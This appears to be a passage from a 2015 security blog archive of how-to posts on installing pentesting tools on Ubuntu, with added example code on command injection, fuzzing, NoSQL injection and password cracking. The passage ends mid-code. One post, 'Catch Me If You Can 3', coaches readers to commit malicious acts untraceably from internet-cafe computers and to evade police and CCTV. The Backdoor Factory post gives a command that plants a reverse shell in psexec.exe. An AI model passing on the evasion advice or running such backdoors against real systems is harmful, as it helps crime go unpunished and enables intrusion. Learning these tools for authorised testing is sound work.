Saturday, August 29, 2015

HOWTO : Commix on Ubuntu 14.04 LTS

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and can be used by web developers, penetration testers or security researchers to test web applications for bugs, errors or vulnerabilities related to command injection. With this tool it is easy to find and exploit a command injection vulnerability in a given parameter or string: Commix sends payloads built from shell metacharacters (separators, pipes, command substitution, time delays) into a parameter and watches whether the server's behaviour shows they were executed. Commix is written in Python.
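Added example (not from the original post and not Commix's own code): the bug class Commix hunts for, shown as a web application's "ping this host" feature built the injectable way next to a hardened version, plus the cheap request-side check for the payload shapes an injection tool sends. The host names and payloads are constructed for illustration.

```python
import re
import subprocess

# Added example (not Commix's code): a "ping this host" feature as a web app
# might implement it, first the injectable way, then a hardened way. Host
# names and payloads below are constructed for illustration.

HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def build_ping_command_unsafe(host):
    """Return the string the vulnerable handler hands to /bin/sh.

    The user value is spliced into a shell command line, so ; | & ` $( ) and
    newlines end the ping command and start an attacker-chosen one. Feeding
    "127.0.0.1; id" here yields "ping -c 1 127.0.0.1; id", which is exactly
    the kind of parameter Commix confirms and exploits.
    """
    return "ping -c 1 " + host


def is_safe_host(host):
    """Allow-list check: letters, digits, dots and dashes, no leading dash
    (so the value cannot be parsed by ping as an option)."""
    return isinstance(host, str) and HOSTNAME_RE.match(host) is not None


def build_ping_command_safe(host):
    """Validate the host, then return an argv list. Passing a list to
    subprocess never invokes a shell, so metacharacters would reach ping
    as a literal argument even if the allow-list were missing."""
    if not is_safe_host(host):
        raise ValueError("invalid host: %r" % (host,))
    return ["ping", "-c", "1", host]


INJECTION_HINT_RE = re.compile(r"[;&|`\n]|\$\(|\bsleep\b")


def looks_like_injection(value):
    """Request-side detection of command separators, pipes, command
    substitution and time-based probes (e.g. '; sleep 5')."""
    return INJECTION_HINT_RE.search(value) is not None


def run_ping(host, timeout=5.0):
    """Execute the hardened form; returns ping's exit status."""
    proc = subprocess.run(build_ping_command_safe(host),
                          capture_output=True, timeout=timeout)
    return proc.returncode


if __name__ == "__main__":
    payload = "127.0.0.1; id"
    print("shell would run :", build_ping_command_unsafe(payload))
    print("looks injected  :", looks_like_injection(payload))
    print("safe argv       :", build_ping_command_safe("127.0.0.1"))
```

The fix is the argv list, not the regex: the allow-list is defence in depth, while passing a list to subprocess removes the shell from the picture entirely. The detection regex is only a hint for logging or a WAF rule; time-based payloads without metacharacters will still slip past it.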


Install

sudo apt-get install git

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/stasinopoulos/commix.git
cd commix
python commix.py -h



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/commix
python commix.py --update



Reference

Wiki


That's all! See you.


HOWTO : HconSTF on Ubuntu 14.04

Hcon Security Testing Framework (HconSTF) is a web application security analysis and penetration testing framework built from Mozilla technologies.

Most of HconSTF is semi-automated, but you still need your brain to work it out. It can be used at all stages of security testing and has tools for tasks such as:

- Web Penetration Testing
- Web Exploits Development
- Web Malware Analysis
- Open Source Intelligence ( Cyber Spying & Doxing )


Install

cd ~
mkdir arsenal
cd arsenal


For x86_64 system :

wget http://sourceforge.net/projects/hconframework/files/HconFramework-Fire/HconSTF_0.5_Prime/HconSTF_v0.5_Prime_Linux_x64.tar.bz2
tar -jxvf HconSTF_v0.5_Prime_Linux_x64.tar.bz2
cd HconSTF
sudo ./HconSTF


For x86 system :

wget http://sourceforge.net/projects/hconframework/files/HconFramework-Fire/HconSTF_0.5_Prime/HconSTF_v0.5_Linux_x86.tar.bz2
tar -jxvf HconSTF_v0.5_Linux_x86.tar.bz2
cd HconSTF
sudo ./HconSTF



Update/Upgrade

rm -R ~/arsenal/HconSTF

Go to the official site to download the latest version and repeat the Install procedure.


Reference

User Manual (PDF)


That's all! See you.


HOWTO : PTF on Ubuntu 14.04 LTS

The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu based distributions to create a similar and familiar distribution for penetration testing. As pentesters, we've become accustomed to the /pentest/ directories or our own toolsets that we want to keep up to date all of the time. We have those "go to" tools that we use on a regular basis, and using the latest and greatest is important.

PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive with the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add to it as you see fit. We commonly see internally developed repos used as part of this framework as well. It's all up to you.

The ultimate goal is community support for this project. We want new tools added to the GitHub repository. Submit your modules. It's super simple to configure and add them and only takes a few minutes.


Install

*** Please be informed that this PTF will install x86 tools only. If your system is x86_64, you need to change the download link in the modules directory when necessary. ***

sudo apt-get install git

cd ~
git clone https://github.com/trustedsec/ptf.git
cd ptf
sudo ./ptf


If you want to install and/or update everything :

use modules/install_update_all
run



All the modules (pentesting tools) are installed in the /pentest directory. Please note that WINE and i386 dependencies will be installed as needed.


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

PTF will try to update itself on every start up. After the first run, you can run PTF from any directory.

If you want to update everything :

sudo ptf
use modules/install_update_all
run



Reference

Video

Documentation


That's all! See you.


Friday, August 28, 2015

Catch Me If You Can 3

Last year, I was talking about how to use NightHawk to do malicious things. The full article is here. Two years ago, I also talked about using a pre-paid SIM card to do malicious things, and the full article is here. However, you may think there is a chance of being caught, as Tor network exit nodes may be monitored by law enforcement. Meanwhile, identity registration may be needed to purchase a SIM card in your country. Okay, today I will introduce another method, using a wired network, to do malicious things untraceably.

In my country, there are many "Internet Cafes" which have a pool of computers running Windows to provide network gaming or internet services to their customers at a cheap hourly price. Those computers are equipped with a "Reborn Card" which resets them to their default state on every reboot. Normally, the "Internet Cafe" reboots its computers every day.

You can hire a computer in the "Internet Cafe" and reboot it. Plug in your Kali Linux or BackBox Linux Live USB (or your custom-made pentesting Linux Live USB). Personally, I recommend BackBox as it has some outstanding features, such as a memory wiper.

After your malicious tasks, you can reboot the computer and it will reset to its default state. Normally, no data or activities will be logged on the computer.

When law enforcement traces your IP address, it will lead them to the "Internet Cafe", but they cannot obtain any evidence from the computer pool as those systems are reborn!

Finally, beware that CCTV may be installed in the "Internet Cafe" or nearby shops and will capture your presence. You may need to do some "make up" when necessary.

That's all! See you.


HOWTO : OpenVAS on Ubuntu 14.04 LTS

OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.


Install

To install OpenVAS 8 on Ubuntu 14.04 LTS :

sudo add-apt-repository ppa:mrazavi/openvas

sudo apt-get update
sudo apt-get install xsltproc sqlite3 openvas

sudo openvas-nvt-sync
sudo openvas-scapdata-sync
sudo openvas-certdata-sync

sudo service openvas-scanner restart
sudo service openvas-manager restart
sudo openvasmd --rebuild --progress


To run it :

Open a browser and point it to https://localhost:443

* The default username and password are both "admin". Change the password before the interface is reachable from anything other than localhost (openvasmd supports --user=admin together with --new-password).


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

sudo openvas-nvt-sync
sudo openvas-scapdata-sync
sudo openvas-certdata-sync

sudo service openvas-scanner restart
sudo service openvas-manager restart
sudo openvasmd --rebuild --progress



Reference

You can disable OpenVAS auto-start on every boot and start it manually. Please note that if OpenVAS is running, the shutdown process will take some time.

For example :

sudo update-rc.d openvas-scanner disable
sudo update-rc.d openvas-manager disable


To start up manually :

sudo service openvas-scanner start
sudo service openvas-manager start


To stop manually :

sudo service openvas-scanner stop
sudo service openvas-manager stop



That's all! See you.


HOWTO : the-backdoor-factory on Ubuntu 14.04 LTS

The Backdoor Factory (BDF) patches executable binaries with user-supplied shellcode in such a way that the shellcode runs and the program then continues its normal execution, so the patched binary still behaves as the original did.


Install

sudo apt-get install git python-pip build-essential

Install BDFactory :

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
cd the-backdoor-factory
sudo pip install capstone
sudo ./install.sh


How to run it (patch a copy of psexec.exe so that it also connects back to a handler at 192.168.0.100:8080; -f is the input binary, -H/-P the handler address and port, -s the payload) :

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp

Install BDFProxy (a mitmproxy-based proxy that patches binaries with BDF as they are downloaded through it) :

cd ~/arsenal
git clone https://github.com/secretsquirrel/BDFProxy.git
cd BDFProxy
sudo ./install.sh


How to run it :

nano bdfproxy.cfg

*change the settings when necessary

./bdf_proxy.py

msfconsole -r bdfproxy_msf_resource.rc



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/the-backdoor-factory
sudo ./update.sh

cd ~/arsenal/BDFProxy
sudo ./update.sh



Reference

See also : Metasploit Framework


That's all! See you.


HOWTO : SPIKE on Ubuntu 14.04 LTS

SPIKE is a block-based network protocol fuzzer for finding exploitable bugs in applications: a protocol message is described as blocks of fixed and variable data, with size fields that are recomputed as the variable parts are mutated, so each test case still looks like a well-formed message to the parser under test.
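Added example (not from the original post and not SPIKE's code): a tiny block-based fuzzer in the spirit of SPIKE's s_block_size()/s_string_variable() primitives, to show why the size field is recomputed per case. The "USER" message layout, the fuzz strings and the field kinds are constructed for illustration.

```python
import socket
import struct

# Added example (not SPIKE's code): a tiny block-based fuzzer in the spirit
# of SPIKE's s_block_size()/s_string_variable() primitives. The message
# layout, the fuzz strings and the "USER" protocol are constructed.

# Field kinds: "size_be32" = 4-byte big-endian length of every field after it
# (recomputed per case), "string" = fixed bytes, "variable" = fuzz point.
MESSAGE = [
    ("len",  "size_be32", None),
    ("verb", "string",    b"USER "),
    ("arg",  "variable",  b"guest"),
    ("eol",  "string",    b"\r\n"),
]

# A short cut of the classes SPIKE's fuzz-string library cycles through.
FUZZ_STRINGS = [
    b"A" * 128, b"A" * 1024, b"A" * 8192,   # overflow probes, growing
    b"%s%n%x%s%n",                           # format string
    b"../../../../../../etc/passwd",         # traversal
    b"\x00", b"\xff" * 64,                   # NUL and high bytes
    b"-1", b"0", b"4294967295",              # integer edge values
]


def build(fields, overrides=None):
    """Serialise fields to bytes; overrides maps field name -> bytes.
    Size fields are computed after the override is applied, so the length
    prefix always agrees with the (possibly huge) payload, as a real client
    would send it."""
    overrides = overrides or {}
    values = [(kind, overrides.get(name, default)) for name, kind, default in fields]
    out = b""
    for i, (kind, value) in enumerate(values):
        if kind == "size_be32":
            rest = b"".join(v for k, v in values[i + 1:] if k != "size_be32")
            out += struct.pack(">I", len(rest))
        else:
            out += value
    return out


def fuzz_cases(fields, fuzz_strings=FUZZ_STRINGS):
    """Yield (field name, wire bytes): one variable field mutated at a time,
    everything else at its default, which is how SPIKE walks its blocks."""
    for name, kind, _ in fields:
        if kind != "variable":
            continue
        for fs in fuzz_strings:
            yield name, build(fields, {name: fs})


def send_case(host, port, case, timeout=3.0):
    """Deliver one case and return whatever the service answered (b"" on
    silence). A case after which the service stops answering is the hint
    that the previous one crashed it; confirm under a debugger."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(case)
        try:
            return s.recv(1024)
        except socket.timeout:
            return b""


if __name__ == "__main__":
    for field, case in fuzz_cases(MESSAGE):
        print(field, len(case), case[:24])
```

Run the target under edb or gdb while send_case() walks the cases, and note which case was in flight when it stopped answering; a fuzzer only finds the crash, the debugger tells you whether it is exploitable.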


Install

sudo apt-get install build-essential

cd ~
mkdir arsenal
cd arsenal
wget http://www.immunitysec.com/downloads/SPIKE2.9.tgz
tar -xzvf SPIKE2.9.tgz
cd SPIKE/src
./configure
make



* For how to use it, please refer to the links at "Reference" below.


Update/Upgrade

Nil


Reference

An Introduction to Fuzzing: Using fuzzers (SPIKE) to find vulnerabilities

Fuzzer Automation with SPIKE


* Or, read the documents at ~/arsenal/SPIKE/SPIKE/documentations


That's all! See you.


HOWTO : MACchanger on Ubuntu 14.04 LTS

A GNU/Linux utility for viewing/manipulating the MAC address of network interfaces.
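Added example (not from the original post and not macchanger's code): the bit-level rules behind what macchanger prints and generates, i.e. the multicast (I/G) and locally administered (U/L) bits of the first octet and the vendor OUI in the first three octets. The sample addresses are constructed.

```python
import os
import re

# Added example (not macchanger's code): the bit-level rules behind what
# macchanger prints and generates. The sample addresses are constructed.

MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}$")


def parse_mac(text):
    if not MAC_RE.match(text):
        raise ValueError("bad MAC address: %r" % (text,))
    return bytes(int(octet, 16) for octet in text.split(":"))


def format_mac(mac):
    return ":".join("%02x" % b for b in mac)


def is_multicast(mac):
    """I/G bit (bit 0 of the first octet): 1 = group address. A host
    interface must never be given one of these."""
    return bool(mac[0] & 0x01)


def is_locally_administered(mac):
    """U/L bit (bit 1 of the first octet): 1 = locally administered,
    0 = burned-in address that carries a vendor OUI."""
    return bool(mac[0] & 0x02)


def oui(mac):
    """First three octets: the vendor prefix macchanger looks up."""
    return format_mac(mac[:3])


def random_mac(keep_oui_of=None, burned_in=False):
    """Generate a random unicast MAC.

    keep_oui_of: keep that address's vendor prefix and randomise only the
                 device part (what macchanger -e does), so the interface
                 still looks like the same vendor's hardware.
    burned_in:   clear the U/L bit so the result looks like a factory
                 address (macchanger -b); by default the U/L bit is set,
                 which is what a fully random macchanger -r produces.
    """
    if keep_oui_of is not None:
        mac = bytearray(keep_oui_of[:3]) + bytearray(os.urandom(3))
        return bytes(mac)
    mac = bytearray(os.urandom(6))
    mac[0] &= 0xFE                 # clear I/G: unicast
    if burned_in:
        mac[0] &= 0xFD             # clear U/L: vendor-looking
    else:
        mac[0] |= 0x02             # set U/L: locally administered
    return bytes(mac)


if __name__ == "__main__":
    for label, mac in [("random", random_mac()),
                       ("random, vendor-looking", random_mac(burned_in=True)),
                       ("same OUI", random_mac(keep_oui_of=parse_mac("00:1a:2b:3c:4d:5e")))]:
        print("%-24s %s  multicast=%s  local=%s  oui=%s" % (
            label, format_mac(mac), is_multicast(mac),
            is_locally_administered(mac), oui(mac)))
```

The practical point: a random address with the U/L bit set stands out to anyone inventorying a network by OUI, which is why keeping the vendor prefix (or clearing the bit) is what you want when the goal is to blend in rather than merely to change the address.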


Install

sudo apt-get install macchanger

macchanger -h



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade



Reference

Nil


That's all! See you.


HOWTO : edb-debugger on Ubuntu 14.04 LTS

edb is a cross platform x86/x86-64 debugger. It was inspired by Ollydbg, but aims to function on x86 and x86-64 as well as multiple OS's. Linux is the only officially supported platform at the moment, but FreeBSD, OpenBSD, OSX and Windows ports are underway with varying degrees of functionality.


Install

sudo apt-get install git build-essential libboost1.55-all-dev qt5-default libqt5xmlpatterns5-dev

cd ~
mkdir arsenal
cd arsenal
git clone --recursive https://github.com/eteran/edb-debugger.git
cd edb-debugger
qmake
make
sudo make install
edb



Update/Upgrade

cd ~/arsenal
rm -R edb-debugger


Repeat the Install procedure as previously mentioned.


Reference

Wiki


That's all! See you.


Thursday, August 27, 2015

HOWTO : Arachni on Ubuntu 14.04 LTS

Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

It is smart, it trains itself by monitoring and learning from the web application's behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives.

Unlike other scanners, it takes into account the dynamic nature of web applications, can detect changes caused while travelling through the paths of a web application’s cyclomatic complexity and is able to adjust itself accordingly. This way, attack/input vectors that would otherwise be undetectable by non-humans can be handled seamlessly.

Moreover, due to its integrated browser environment, it can also audit and inspect client-side code, as well as support highly complicated web applications which make heavy use of technologies such as JavaScript, HTML5, DOM manipulation and AJAX.

Finally, it is versatile enough to cover a great deal of use cases, ranging from a simple command line scanner utility, to a global high performance grid of scanners, to a Ruby library allowing for scripted audits, to a multi-user multi-scan web collaboration platform.


Install

cd ~
mkdir -p arsenal
cd arsenal
wget https://github.com/Arachni/arachni/releases/download/v1.2.1/arachni-1.2.1-0.5.7.1-linux-x86_64.tar.gz
tar -xvzf arachni-1.2.1-0.5.7.1-linux-x86_64.tar.gz
cd arachni-1.2.1-0.5.7.1/bin
./arachni_web


Start Firefox and point to http://127.0.0.1:9292

* Default credentials are as follows (change them before the web UI is reachable from other hosts) :

Administrator account

E-mail: admin@admin.admin
Password: administrator

Regular user account

E-mail: user@user.user
Password: regular_user


Update/Upgrade

rm -R ~/arsenal/arachni-1.2.1-0.5.7.1

Then repeat the Install procedure but to download the latest version.


Reference

Wiki


That's all! See you.


Sunday, August 23, 2015

HOWTO : NoSQLMap on Ubuntu 14.04 LTS

NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases as well as web applications using NoSQL in order to disclose data from the database.

It is named as a tribute to Bernardo Damele and Miroslav Stampar's popular SQL injection tool sqlmap, and its concepts are based on and extend Ming Chow's excellent presentation at Defcon 21, "Abusing NoSQL Databases". Presently the tool's exploits are focused on MongoDB, but support for other NoSQL platforms such as CouchDB, Redis and Cassandra is planned for future releases.
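Added example (not from the original post and not NoSQLMap's code): the MongoDB operator injection NoSQLMap automates, shown as the filter document a vulnerable login handler builds from a decoded JSON body, next to a handler that refuses it, and the blind $regex extraction that turns such a login into an oracle for reading the stored password. There is no MongoDB here: a minimal in-process evaluator for $ne, $gt and $regex stands in for the server, and the user records are constructed.

```python
import re

# Added example (not NoSQLMap's code). A minimal evaluator stands in for
# MongoDB so the effect can be seen offline; users and passwords are
# constructed sample data.

USERS = [
    {"user": "admin", "pass": "s3cret"},
    {"user": "guest", "pass": "guest"},
]


def build_login_filter_unsafe(body):
    """Copy decoded JSON values straight into the filter. With a body of
    {"user": "admin", "pass": {"$ne": ""}} the password clause becomes an
    operator, not a string, and matches for any password."""
    return {"user": body.get("user"), "pass": body.get("pass")}


def build_login_filter_safe(body):
    """Accept only scalar strings for fields that are compared to stored
    values, so a JSON object can never be promoted to a query operator."""
    user, pw = body.get("user"), body.get("pass")
    if not isinstance(user, str) or not isinstance(pw, str):
        raise ValueError("credentials must be strings")
    return {"user": user, "pass": pw}


def accepts(body):
    """True if the hardened handler would pass the body on to the query."""
    try:
        build_login_filter_safe(body)
        return True
    except ValueError:
        return False


def matches(filter_doc, record):
    """Evaluate a filter against one record for the operators that matter
    here ($ne, $gt, $regex); anything else is rejected loudly."""
    for field, cond in filter_doc.items():
        value = record.get(field)
        if not isinstance(cond, dict):
            if value != cond:
                return False
            continue
        for op, arg in cond.items():
            if op == "$ne":
                ok = value != arg
            elif op == "$gt":
                ok = isinstance(value, str) and value > arg
            elif op == "$regex":
                ok = isinstance(value, str) and re.search(arg, value) is not None
            else:
                raise ValueError("unsupported operator " + op)
            if not ok:
                return False
    return True


def login_unsafe(body, users=USERS):
    """Records the vulnerable handler would log the caller in as."""
    f = build_login_filter_unsafe(body)
    return [u for u in users if matches(f, u)]


def extract_password(user, users=USERS,
                     alphabet="abcdefghijklmnopqrstuvwxyz0123456789", max_len=32):
    """Recover a password character by character through the login oracle
    using anchored $regex conditions: the blind technique NoSQLMap scripts."""
    known = ""
    for _ in range(max_len):
        for ch in alphabet:
            probe = {"user": user, "pass": {"$regex": "^" + re.escape(known + ch)}}
            if login_unsafe(probe, users):
                known += ch
                break
        else:
            return known  # no character extends the prefix
        done = {"user": user, "pass": {"$regex": "^" + re.escape(known) + "$"}}
        if login_unsafe(done, users):
            return known
    return known


if __name__ == "__main__":
    print("bypass :", login_unsafe({"user": "admin", "pass": {"$ne": ""}}))
    print("safe?  :", accepts({"user": "admin", "pass": {"$ne": ""}}))
    print("leaked :", extract_password("admin"))
```

Two things follow from this. Type-checking the decoded input is the fix, not escaping, because the injection is a JSON type confusion rather than a quoting problem. And storing passwords in clear text is what makes the $regex oracle worthwhile; against a proper password hash the same oracle would only leak the hash.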


Install

sudo apt-get install git python-setuptools

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/tcstool/nosqlmap.git
cd nosqlmap
sudo python setup.py install
python nosqlmap.py



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/nosqlmap
git pull origin master
sudo python setup.py install --force



Reference

GitHub
Videos

See also : Metasploit Framework


That's all! See you.


HOWTO : BeEF on Ubuntu 14.04 LTS

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.


Install

sudo apt-get install git curl libsqlite3-dev sqlite3 imagemagick ghostscript

Install Ruby via RVM (note that the installer script is fetched from the network and piped straight into bash; if that is not acceptable in your environment, download the script first, verify it, and run it from disk) :

gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
curl -sSL https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
echo "source ~/.rvm/scripts/rvm" >> ~/.bashrc
source ~/.bashrc
rvm install 2.1.5
ruby -v


Install BeEF :

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/beefproject/beef.git

* https rather than git:// so that the clone is authenticated by TLS; git:// is plain text and can be tampered with on the path.

cd beef
rvm use ruby-2.1.5@beef --create
gem install bundler
bundle install
./beef


Open a browser and go to http://127.0.0.1:3000/ui/panel
* The username is "beef" and the password is "beef". Change them in config.yaml before hooking anything outside a lab.

* BeEF uses Ruby 2.1.5 by default.


Update/Upgrade

cd ~/arsenal/beef
git pull origin master
bundle install
./update-beef



Reference

Videos

See also : Metasploit Framework


That's all! See you.


HOWTO : SET on Ubuntu 14.04 LTS

The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.


Install

sudo apt-get install git python-impacket

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/trustedsec/social-engineer-toolkit.git
cd social-engineer-toolkit


sudo python setup.py install

Edit the Metasploit path :

sudo nano /etc/setoolkit/set.config
METASPLOIT_PATH=/home/samiux/arsenal/metasploit-framework


* Replace /home/samiux with your own home directory so the path points at your Metasploit checkout.

To run it :

sudo setoolkit


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

sudo seupdate



Reference

See also : Metasploit Framework


That's all! See you.


HOWTO : Metasploit Framework on Ubuntu 14.04 LTS

Metasploit is an exploitation framework.


Install

sudo apt-get install git build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev default-jre autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev xtightvncviewer libyaml-dev libffi-dev libgmp-dev

cd ~
mkdir arsenal
cd arsenal

Install Ruby :

gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
curl -sSL https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
echo "source ~/.rvm/scripts/rvm" >> ~/.bashrc
source ~/.bashrc
rvm install 2.1.6
rvm use 2.1.6 --default
ruby -v


* Metasploit Framework uses Ruby 2.1.6 by default (the version is recorded in the .ruby-version file of the checkout).

Install NMap :

* Install NMap if you do not have it installed; otherwise, skip it.

cd ~/arsenal
git clone https://github.com/nmap/nmap.git
cd nmap
./configure
make
sudo make install


Configure PostgreSQL :

sudo -s
su postgres

createuser msf -P -S -R -D

* enter "msf" as password
createdb -O msf msf
exit
exit


Install Metasploit Framework :

cd ~/arsenal
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
rvm --default use ruby-2.1.6@metasploit-framework --create
gem install bundler
bundle install


Configure Metasploit :

cp ~/arsenal/metasploit-framework/config/database.yml.example ~/arsenal/metasploit-framework/config/database.yml
nano ~/arsenal/metasploit-framework/config/database.yml

development: &pgsql
  adapter: postgresql
  database: msf
  username: msf
  password: msf
  host: localhost
  port: 5432
  pool: 75
  timeout: 5

sudo sh -c "echo export MSF_DATABASE_CONFIG=/home/samiux/arsenal/metasploit-framework/config/database.yml >> /etc/profile"

source /etc/profile


* Replace /home/samiux with your own home directory.

To run it :

cd ~/arsenal
cd metasploit-framework
sudo service postgresql start
msfconsole
sudo service postgresql stop



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade
cd ~/arsenal/metasploit-framework
git pull origin master
msfupdate



Reference

See also : NMap


That's all! See you.


Saturday, August 22, 2015

HOWTO : John on Ubuntu 14.04 LTS

John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.
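Added example (not from the original post and not John's code): the core loop of a wordlist attack with a small subset of John-style mangling rules, run against unsalted and salted fast hashes so that the effect of a salt is visible. The hash formats, the rules and the wordlist are constructed for illustration; the md5 and sha256 digests of "password" used in the usage section are the well-known values.

```python
import hashlib
import hmac

# Added example (not John's code): a wordlist attack with a few John-style
# mangling rules against unsalted and salted fast hashes. Formats, rules
# and wordlist are constructed for illustration.

HASHERS = {
    # format name -> function(password, salt) -> hex digest
    "raw-md5":       lambda pw, salt: hashlib.md5(pw.encode()).hexdigest(),
    "raw-sha256":    lambda pw, salt: hashlib.sha256(pw.encode()).hexdigest(),
    "salted-sha256": lambda pw, salt: hashlib.sha256((salt + pw).encode()).hexdigest(),
}


def hash_password(password, fmt, salt=""):
    """Produce a target hash in one of the formats above (for test data)."""
    return HASHERS[fmt](password, salt)


def mangle(word):
    """A small subset of John's default rules: case variants, digit and
    symbol suffixes, reversal. Real rulesets are far larger; this is what
    turns 'summer' into 'Summer9'. Yields 37 candidates per word."""
    bases = [word, word.capitalize(), word.upper()]
    for base in bases:
        yield base
        for d in "0123456789":
            yield base + d
        yield base + "!"
    yield word[::-1]


def crack(target_hex, fmt, wordlist, salt=""):
    """Try every mangled candidate; returns (password or None, guesses made).
    A salt only defeats precomputed tables: each guess still costs one fast
    hash, which is why a slow KDF (bcrypt, PBKDF2) is what actually hurts
    a cracker."""
    hasher = HASHERS[fmt]
    guesses = 0
    for word in wordlist:
        for candidate in mangle(word):
            guesses += 1
            if hmac.compare_digest(hasher(candidate, salt), target_hex):
                return candidate, guesses
    return None, guesses


if __name__ == "__main__":
    wordlist = ["letmein", "winter", "summer", "password"]
    # md5("password"), the well-known digest
    print(crack("5f4dcc3b5aa765d61d8327deb882cf99", "raw-md5", wordlist))
    target = hash_password("Summer9", "salted-sha256", salt="s4lt")
    print(crack(target, "salted-sha256", wordlist, salt="s4lt"))
```

What makes John fast is not cleverness in this loop but the hash implementations behind it (SIMD and, in the jumbo build, OpenCL/CUDA), which is why the GPU driver note under Reference matters for anyone cracking at scale.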


Install

sudo apt-get install build-essential libssl-dev

cd ~
mkdir arsenal
cd arsenal

wget http://www.openwall.com/john/j/john-1.8.0-jumbo-1.tar.gz
tar -xvzf john-1.8.0-jumbo-1.tar.gz
cd john-1.8.0-jumbo-1/src

./configure
make clean
make

cd ../run
./john --help



* You can also install the distribution package with sudo apt-get install john john-data, which may be older than the jumbo release built above.


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade


Go to Official site to download the source and compile it as mentioned above.


Reference

Install the Nvidia or AMD graphics drivers (with their CUDA/OpenCL SDK) before building John if you want the GPU formats of the jumbo build.


That's all! See you.


HOWTO : NetCat on Ubuntu 14.04 LTS

Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol.

It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. Netcat, or "nc" as the actual program is named, should have been supplied long ago as another one of those cryptic but standard Unix tools.


Install

sudo apt-get install netcat-traditional
sudo update-alternatives --config nc


select /bin/nc.traditional by entering its number from the menu ("2" in the default listing)

nc -h


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade



Reference

Nil


That's all! See you.


HOWTO : CMSMap on Ubuntu 14.04 LTS

CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs. The main purpose of CMSmap is to integrate common vulnerabilities for different types of CMSs in a single tool.

At the moment, CMSs supported by CMSmap are WordPress, Joomla and Drupal.
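Added example (not from the original post and not CMSmap's code): the passive half of CMS detection, i.e. what a scanner can tell from one fetched page and its response headers before it starts requesting known paths. The signatures are a small constructed set for WordPress, Joomla and Drupal, the input is a string so the code runs offline, and the HTML and headers in the usage section are constructed.

```python
import re

# Added example (not CMSmap's code): passive CMS fingerprinting from one
# page body and its headers. Signatures are a constructed subset.

SIGNATURES = {
    "WordPress": [
        re.compile(r'<meta\s+name="generator"\s+content="WordPress\s*([\d.]*)', re.I),
        re.compile(r"/wp-(?:content|includes)/", re.I),
    ],
    "Joomla": [
        re.compile(r'<meta\s+name="generator"\s+content="Joomla!?\s*([\d.]*)', re.I),
        re.compile(r"/media/(?:jui|system)/|/components/com_", re.I),
    ],
    "Drupal": [
        re.compile(r'<meta\s+name="generator"\s+content="Drupal\s*([\d.]*)', re.I),
        re.compile(r"/sites/(?:default|all)/|/misc/drupal\.js", re.I),
    ],
}


def fingerprint(html, headers=None):
    """Return {"scores": {cms: hits}, "versions": {cms: version}}.
    Each matching signature adds one hit; a generator tag (or Drupal's
    X-Generator header) may also leak a version string."""
    headers = {k.lower(): v for k, v in (headers or {}).items()}
    scores, versions = {}, {}
    for cms, patterns in SIGNATURES.items():
        for pat in patterns:
            m = pat.search(html)
            if not m:
                continue
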